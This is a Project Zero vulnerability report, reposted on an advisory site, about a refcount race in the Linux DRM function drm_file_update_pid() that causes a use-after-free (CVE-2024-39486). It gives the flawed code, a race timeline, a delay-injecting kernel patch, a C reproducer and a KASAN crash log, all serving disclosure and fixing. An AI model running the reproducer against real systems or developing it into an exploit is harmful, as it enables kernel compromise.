Linux DRM drm_file_update_pid() Race Condition / Use-After-Free

2024.08.06
Credit: Jann Horn
Risk: High
Local: No
Remote: Yes
CWE: CWE-362

Linux: DRM: refcount incremented too late in drm_file_update_pid() [I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?] === summary === drm_file_update_pid() calls get_pid() too late, which creates a race condition that can lead to use-after-free of a `struct pid`. I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you. === verbose bug report === drm_file_update_pid() contains the following code: ``` struct drm_device *dev; struct pid *pid, *old; /* * Master nodes need to keep the original ownership in order for * drm_master_check_perm to keep working correctly. (See comment in * drm_auth.c.) */ if (filp->was_master) return; pid = task_tgid(current); [...] dev = filp->minor->dev; mutex_lock(&dev->filelist_mutex); old = rcu_replace_pointer(filp->pid, pid, 1); mutex_unlock(&dev->filelist_mutex); if (pid != old) { get_pid(pid); synchronize_rcu(); put_pid(old); } ``` filp->pid is a refcounted pointer which can only be modified under dev->filelist_mutex. After calling rcu_replace_pointer(), we have a refcount debt of 1, which is still fine because we're holding the mutex that prevents other tasks from taking ownership of the reference stored in filp->pid; but by the time we drop this mutex, we must have called get_pid() to make up for this refcount debt, and that isn't done. So a use-after-free can occur in the following scenario, assuming filp->pid initially points to the pid of process A and process B's initial pid refcount is 1: process A process B ========= ========= begin drm_file_update_pid mutex_lock(&dev->filelist_mutex) rcu_replace_pointer(filp->pid, <pid B>, 1) mutex_unlock(&dev->filelist_mutex) begin drm_file_update_pid mutex_lock(&dev->filelist_mutex) rcu_replace_pointer(filp->pid, <pid A>, 1) mutex_unlock(&dev->filelist_mutex) get_pid(<pid A>) synchronize_rcu() put_pid(<pid B>) *** pid B reaches refcount 0 and is freed here *** get_pid(<pid B>) *** UAF *** synchronize_rcu() put_pid(<pid A>) Note that this race can only occur if RCU is configured so that running in preemptible task context can count as an RCU quiescent state. My testcase assumes that the kernel is configured for full preemption (meaning either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption selected at boot time); however, I think in theory the bug can probably be hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel builds with dynamic preemption), since I think on such builds, expedited grace periods can still detect RCU quiescent states with IPIs. My reproducer also requires that you patch the following code into the kernel to slow down execution and make the bug easy to trigger: ``` diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c index 638ffa4444f5..03e7711e9744 100644 --- a/drivers/gpu/drm/drm_file.c +++ b/drivers/gpu/drm/drm_file.c @@ -38,6 +38,7 @@ #include <linux/pci.h> #include <linux/poll.h> #include <linux/slab.h> +#include <linux/delay.h> #include <drm/drm_client.h> #include <drm/drm_drv.h> @@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp) old = rcu_replace_pointer(filp->pid, pid, 1); mutex_unlock(&dev->filelist_mutex); + if (strcmp(current->comm, \"SLOWME\") == 0) { + pr_warn(\"%s: BEGIN DELAY\ \", __func__); + mdelay(1000); + pr_warn(\"%s: END DELAY\ \", __func__); + } + if (pid != old) { get_pid(pid); synchronize_rcu(); ``` The reproducer code: ``` #include <unistd.h> #include <stdio.h> #include <err.h> #include <fcntl.h> #include <stdlib.h> #include <sys/signal.h> #include <sys/ioctl.h> #include <sys/prctl.h> #include <sys/wait.h> #include <drm/drm.h> #define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\ }) static void main_test_code() { struct drm_version dummy_version; int drm_fd = SYSCHK(open(\"/dev/dri/renderD128\", O_RDONLY)); int child = SYSCHK(fork()); if (child == 0) { /* child process */ prctl(PR_SET_NAME, \"SLOWME\"); ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here } else { /* parent process */ usleep(200*1000); ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); } if (child == 0) { /* child process */ exit(0); } else { /* parent process */ int status = 0; pid_t child = wait(&status); printf(\"wait() returned %d, status %d\ \", child, status); exit(0); } } int main(void) { // run in a child process to avoid extra references from job control or such int child = SYSCHK(fork()); if (child == 0) { prctl(PR_SET_PDEATHSIG, SIGKILL); main_test_code(); } else { int status = 0; pid_t child = wait(&status); printf(\"wait() returned %d, status %d\ \", child, status); } } ``` The resulting KASAN splat (tested on mainline plus the race widener patch above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y): ``` ================================================================== BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4)) Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092 CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Call Trace: <TASK> dump_stack_lvl (lib/dump_stack.c:117) print_report (mm/kasan/report.c:378 mm/kasan/report.c:488) kasan_report (mm/kasan/report.c:603) kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1)) drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4)) drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737) drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842) __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898) do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) [...] </TASK> Allocated by task 1091: kasan_save_stack (mm/kasan/common.c:48) kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1)) __kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338) kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009) alloc_pid (kernel/pid.c:187) copy_process (kernel/fork.c:2406) kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798) __do_sys_clone (kernel/fork.c:2929) do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) Freed by task 1091: kasan_save_stack (mm/kasan/common.c:48) kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1)) kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1)) poison_slab_object (mm/kasan/common.c:242) __kasan_slab_free (mm/kasan/common.c:256 (discriminator 1)) kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3)) put_pid.part.0 (kernel/pid.c:122) drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737) drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842) __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898) do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) The buggy address belongs to the object at ffff88811f2f68c0 which belongs to the cache pid of size 240 The buggy address is located 0 bytes inside of freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0) The buggy address belongs to the physical page: page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6 head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0x200000000000040(head|node=0|zone=2) page_type: 0xffffefff(slab) raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000 raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000 head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000 head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000 head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000 head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc >ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb ^ ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc ================================================================== ``` === disclosure deadline === This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-09-25. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure- policy.html Related CVE Numbers: CVE-2024-39486. Found by: jannh@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top